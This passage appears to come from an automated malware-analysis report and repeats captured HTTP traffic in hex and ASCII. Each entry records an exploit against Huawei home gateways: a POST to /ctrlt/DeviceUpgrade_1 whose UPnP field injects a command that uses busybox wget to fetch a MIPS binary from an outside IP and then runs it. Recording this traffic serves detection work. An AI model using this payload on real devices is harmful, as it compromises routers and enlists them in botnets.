2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 